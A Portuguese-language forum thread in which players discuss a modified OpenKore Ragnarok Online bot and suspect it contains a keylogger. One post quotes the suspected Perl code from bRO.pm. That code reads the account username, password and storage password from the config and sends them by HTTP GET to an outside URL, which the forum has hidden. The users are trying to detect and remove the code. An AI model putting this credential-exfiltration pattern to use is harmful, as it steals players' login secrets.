Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Openkore Totalmente Funcional,Atualizado Toda Semana,Thor/Odin,Macros,Campal,Scan


 Compartilhar

Posts Recomendados

Bom como comentei acima o bot funcionou,porem como tem muitas pessoas dizendo que tem KL fui verificar não achei, mas estão diferentes da disponibilizada pelo OponKoreW e consecutivamente diferente da BROcenter. Como dizia Shishio "Confie e sera traido. Descuide-se e será morto. Mate antes que te Matem". Nunca confie em nada na net, lembre que não estamos seguindo as regras do jogo então não se te roubarem não tem choro, mude a senha constantemente e leia os post e comentários relacionado para ver se tem algum "problema" acontecendo.Não estou dizendo que tem KL no Okore que o kingdonhearts12 postou, estou dizendo que esta diferente em relação ao do OkoreWiki.

Link para o comentário
Compartilhar em outros sites

Bom como comentei acima o bot funcionou,porem como tem muitas pessoas dizendo que tem KL fui verificar não achei, mas estão diferentes da disponibilizada pelo OponKoreW e consecutivamente diferente da BROcenter. Como dizia Shishio "Confie e sera traido. Descuide-se e será morto. Mate antes que te Matem". Nunca confie em nada na net, lembre que não estamos seguindo as regras do jogo então não se te roubarem não tem choro, mude a senha constantemente e leia os post e comentários relacionado para ver se tem algum "problema" acontecendo.Não estou dizendo que tem KL no Okore que o kingdonhearts12 postou, estou dizendo que esta diferente em relação ao do OkoreWiki.

 

Olhe neste arquivo bRO.pm ele fica na pasta openkore/src/network/send

 

o script do kl e este:

 

É necessário se cadastrar para acessar o conteúdo.

Link para o comentário
Compartilhar em outros sites

Se eu exclui essa parada aki eu tiro o KL?

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Link para o comentário
Compartilhar em outros sites

Sim esta funcionando quanto vc tatueira,acho que o openkore não esta reconehcendo a sua senha,talvez seje algum caracter meio diferente e por isso ele nao quer entrar,tente trocar sua senha e coloca outro caracter mais reconhecido talvez assim de certo,abraço

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.